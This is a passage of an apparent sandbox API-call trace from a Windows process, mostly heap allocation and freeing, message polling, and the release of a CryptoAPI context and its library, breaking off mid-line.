CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0130.139] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0130.140] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0130.140] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0130.185] TranslateMessage (lpMsg=0x144ebd4) returned 0 [0130.185] DispatchMessageW (lpMsg=0x144ebd4) returned 0x0 [0130.185] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0130.185] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0130.186] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0130.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0130.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0130.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0130.186] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0130.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac10 [0130.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0130.186] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0130.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0130.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0130.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0130.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0130.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0130.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0130.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0130.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0130.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0130.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0130.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0130.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0130.187] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0130.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0130.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0130.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0130.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0130.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0130.187] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923e8 | out: hHeap=0x1780000) returned 1 [0130.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0130.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad18 [0130.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0130.187] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0130.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0130.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0130.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0130.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0130.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0130.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0130.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0130.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0130.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0130.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0130.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0130.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0130.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0130.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0130.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0130.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0130.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0130.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0130.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0130.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0130.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0130.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0130.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0130.188] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0130.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0130.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0130.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad30 [0130.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0130.188] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0130.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0130.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0130.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0130.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0130.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0130.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0130.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0130.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0130.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0130.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0130.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0130.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0130.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0130.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0130.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0130.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0130.188] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0130.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0130.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0130.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0130.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0130.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0130.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0130.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0130.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0130.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0130.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0130.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0130.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0130.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0130.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0130.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0130.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0130.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0130.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0130.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0130.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0130.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0130.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0130.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0130.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0130.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0130.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0130.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0130.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0130.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0130.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0130.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0130.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0130.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0130.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0130.190] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0130.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0130.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0130.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0130.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0130.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0130.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0130.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0130.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0130.190] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0130.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0130.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e18 [0130.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad78 [0130.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0130.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0130.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0130.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0130.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0130.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0130.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0130.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0130.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0130.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0130.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0130.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0130.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0130.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0130.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0130.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0130.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0130.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0130.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0130.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0130.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0130.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0130.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0130.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0130.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0130.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0130.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0130.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0130.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0130.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0130.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0130.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0130.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0130.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0130.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0130.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0130.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0130.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0130.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0130.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0130.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0130.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0130.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0130.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0130.192] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0130.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0130.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0130.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0130.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0130.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0130.192] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0130.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0130.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad18 [0130.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0130.193] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0130.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0130.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0130.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0130.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0130.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0130.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0130.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0130.193] FreeLibrary (hLibModule=0x756e0000) returned 1 [0130.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0130.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0130.193] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0130.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0130.193] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0130.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0130.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0130.193] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0130.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0130.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0130.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0130.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0130.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0130.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0130.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0130.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0130.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0130.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab38 [0130.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0130.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad60 [0130.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0130.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac10 [0130.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac28 [0130.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0130.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0130.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0130.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0130.194] CloseHandle (hObject=0x2a0) returned 1 [0130.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0130.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0130.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eaa90 | out: hHeap=0x1780000) returned 1 [0130.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0130.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0130.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0130.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0130.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0130.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0130.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0130.195] HeapFree (in: hHeap=0x1780000, 